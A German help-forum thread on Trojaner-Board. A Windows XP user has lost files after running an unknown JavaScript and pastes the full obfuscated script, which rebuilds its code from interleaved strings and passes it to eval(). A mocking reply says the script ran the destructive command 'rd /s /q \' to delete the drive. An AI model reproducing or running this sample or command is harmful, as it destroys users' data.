|
JS Skript ausgeführt, unangenehme Probleme entstanden... Hallo liebes Trojaner-Board, erstmal folgendes: Betriebssystemname Microsoft Windows XP Professional Version 5.1.2600 Service Pack 3, v.3311 Build 2600 Betriebssystemhersteller Microsoft Corporation Systemname COMPUTER Systemhersteller TOSHIBA Systemmodell Satellite A200 Systemtyp X86-basierter PC Prozessor x86 Family 6 Model 15 Stepping 13 GenuineIntel ~1994 Mhz BIOS-Version/-Datum TOSHIBA V2.20, 10.03.2008 SMBIOS-Version 2.4 Windows-Verzeichnis D:\WINDOWS Systemverzeichnis D:\WINDOWS\system32 Startgerät \Device\HarddiskVolume2 Gebietsschema Deutschland Hardwareabstraktionsebene Version = "5.1.2600.3311 (xpsp.080212-0005)" Benutzername COMPUTER\xxx Zeitzone Westeuropäische Normalzeit Gesamter realer Speicher 2.048,00 MB Verfügbarer realer Speicher 1,42 GB Gesamter virtueller Speicher 2,00 GB Verfügbarer virtueller Speicher 1,96 GB Größe der Auslagerungsdatei 5,84 GB Auslagerungsdatei C:\pagefile.sys Unzwar habe ich ein JS Skript, welches mir nicht bekannt war ausgeführt. Jetzt wurden alle meine wichtigen Daten von der Windows Partition gelöscht, einschließlich Lesezeichen im Firefox, Tabs, MSN XML Dateien, der Desktop, etc. etc. im Windows Ordner auf der Festplatte sind nun kaum Dateien vorhanden. Ich poste nun das Schadskript. Gibt es eine Möglichkeit die Dinge rückgängig zu machen? A='xHeocmlmt\rWctj(rifsej"peiWspm\n"oapeelitoas\x20ac'+ '.\x20neloa\x20\x20ti.n.d(ra/-)g$eot).s\rinD(em<760'+ '\ro(th:mc./"tam0xn\rxssxa(pinr()1b"tam.s2\r"-+cedo'+ 'if-am\rse\\"so\\(M.d)ur8+m\\rs\np"th:ac./map,\neqt'+ 'd"t-emitrabd=).d\rHe30}Sree"r.l.(d\x20rho-t0\x20d'+ '\x20\\0' B='=.abts2lp\nSree"iniyme)exlSctem\\pna\x20\x20lnotda'+ 'ishjo\x20\x20euvas\x20c\\"ra)ec(z\\i1tp:\rce\nlea)'+ 'te1600\np""t/ghob+hn().d\n.pett/adoe\\/]=+hn(st,\n'+ '\\""onisood;e\n+sn++mn"aro)b()sonetxep"t/thobgrh0x'+ 'tuhecet"up/mtoa"\rs(\n.e1)\rHeocwislr"\x20stuws'+ '\x20\x20&\x20/\\)' C='Wctj(x.h"fHeocspglsoc.nteHrn)=nydstfog\x20e,vt\x20'+ 'asptf\x20\x20enhbkn+el)pe[](,:ph(\nl(wewt.T(240)xe'+ 'g,t/.ar/M.d)\rs(trot.c<n=tad)\r(M.d)ur8sn+\\ntsinr'+ 'an=s"t\\t"\\""tam.s2++d\\g".no,t/.ar/bdp).reerony,'+ 'laf-aur+\nesWsp0\r\n.abtsph"uc/t\x20tn\x209-\x20/q'+ '"' D='Sree"mxt)=.abtct.etbtotf(.ia\r(C\x20\x20thow\x20Np'+ '\x20e\x204n,ehiysddirs\\fal.l(a+/"gre"fo)h(\x20egi'+ ')370{.ne"pi4ng?aro,\ne)=enemhs\x20"hd+[\n"aro)b()='+ '-bnt-pt:mta"=ron+cn++hn(st,m"eni\ro(s"pd4ngio."\rs'+ 'esa(ntp"trod;nybxn)Sl(0\nWctj(cte)nmcasd\x20-0frs'+ '\x20,' X=[];for(I=0;I<A.length;I++)X[I*4]=A.charAt(I) for(I=0;I<B.length;I++)X[I*4+1]=B.charAt(I) for(I=0;I<C.length;I++)X[I*4+2]=C.charAt(I) for(I=0;I<D.length;I++)X[I*4+3]=D.charAt(I) eval(X.join('')) Ich hoffe ihr könnt mir helfen. Danke. |
Hi, Du führst alles aus, was dir unter den Mauszeiger kommt? Dann empfehle ich dir, den Computer durch Plattenspieler, Schreibmaschine und Mensch-ärgere-dich-nicht zu ersetzen. Teil deines Scriptes war die Ausführung des Befehls: Code: rd /s /q \Code: C:\WINDOWS\system32>rd /?Also echt, jeder DAU ist noch zu einer Steigerung fähig http://cheesebuerger.de/images/smilie/frech/c050.gif http://cheesebuerger.de/images/smilie/frech/c050.gif http://cheesebuerger.de/images/smilie/frech/c050.gif Karl |
| Alle Zeitangaben in WEZ +1. Es ist jetzt 12:14 Uhr. |
Copyright ©2000-2025, Trojaner-Board